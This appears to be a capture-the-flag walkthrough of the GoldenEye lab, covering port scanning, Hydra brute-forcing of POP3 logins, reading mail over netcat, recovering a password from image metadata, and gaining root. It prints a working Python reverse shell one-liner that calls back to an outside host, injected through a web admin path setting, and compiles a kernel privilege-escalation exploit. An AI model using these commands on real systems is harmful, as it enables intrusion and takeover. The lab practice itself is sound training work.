GoldenEye CTF
This room aims to use pop3 ports. Also, reverse shell, escalating privileges by using known exploits. Lets make a quick scan. Also, we are scanning all ports by using -p- switch. Lets make this scan faster by using -T4 switch.
nmap -p- -T4 10.10.193.23580 and 25th port are open at the top of the 1000 ports.
Also 55006 and 55007th ports are open and they are used for pop3 services.
Use nmap to scan the network for all ports. How many ports are open?
4
There is a web page. Lets make a gobuster scanning. While the scan goes on, lets investigate the page manually.
With right click, and view page source, we reach a js code.
terminal.js file might be important.
Here we go!
Who needs to make sure they update their default password?
Boris
There is an encoded phrase. Lets decode this phrase by using Burp’s decoder.
We are choosing HTML decode and decode this phrase.
Navigate /sev-home directory. There is a basic authentication on this page.
I am trying with Boris and founded password. This is false. I try admin, Admin, and boris.
“boris” is true. There is not much thing here. But we get Natalya Boris and POP3 service. Most probably, we will use these information.
TASK 2
If those creds don’t seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?
hydra -l Boris -P /usr/share/wordlists/fasttrack.txt 10.10.193.235-s 55007 pop3
Lets connect the target by using netcat with the following command:
nc <TARGET_IP_ADRESS> 55007
USER Boris
PASS S******Lets List all the emails by using LIST.
We can retrieve all the mails by RETR command with index numbers as in the following.
Lets look at Natalya’s mails. First, we need her password.
We may crack it by using hydra again.
Lets get her email messages by connecting mail client with netcat.
We got a new user credentials and a hidden directory info.
TASK 3
Lets edit /etc/hosts file by using nano text editor.
<machines ip> severnaya-station.com
And, go to
severnaya-station.com/gnocertdir
and login with xenia user and password. Lets move on tabs. We can see an interesting message on messages tab. We see a new name dr doak.
Lets try to crack his password again by using hydra:
We got doak’s password. Lets connect the emain client.
We got web credentials:
Lets go to “http://severnaya-station.com/gnocertdir” with these credentials.
I reach a secret file on “my private files” tag.
Lets download this file. There is a directory on this location.
Lets go and download this jpg file.
I try stegcracker also, but it doesnt work. Simply, the info is in the exif info location. We can use strings command.
There is an encoded info. Lets decode this by using cyberchef. Here we go!
We reach another password.
We can try this password on pop3 connection or web page.
Username : Admin
Password : this_password
Yess!
Go to “Site Administration>Server>System Paths”
There is code area. We can inject a reverse shell code here.
I use Python reverse shell on the following link:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'Then, lets edit text editors from plugins tag.
Attention! I have tryed more than one reverse shell codes. I got the shell by using the above code.
We need to trigger this script. But first, lets start to listen this port.
I add a file and click spellcheck button.
Okeyy! We got the shell.
I get the code recommended to my machine. By using python, I publish a web server. By using wget command, I send this code to target.
Then run the command with output enum.txt.
I can use those commands. Recommended exploit is c file. Thus, we can use cc instead of gcc.
I send the c code to target. However, when I run the code, I got the following error.
THus, I turn back to original code, and change the following line:
When I run the exploit with:
cc ofs.c -o ofs
./ofs
I became root.
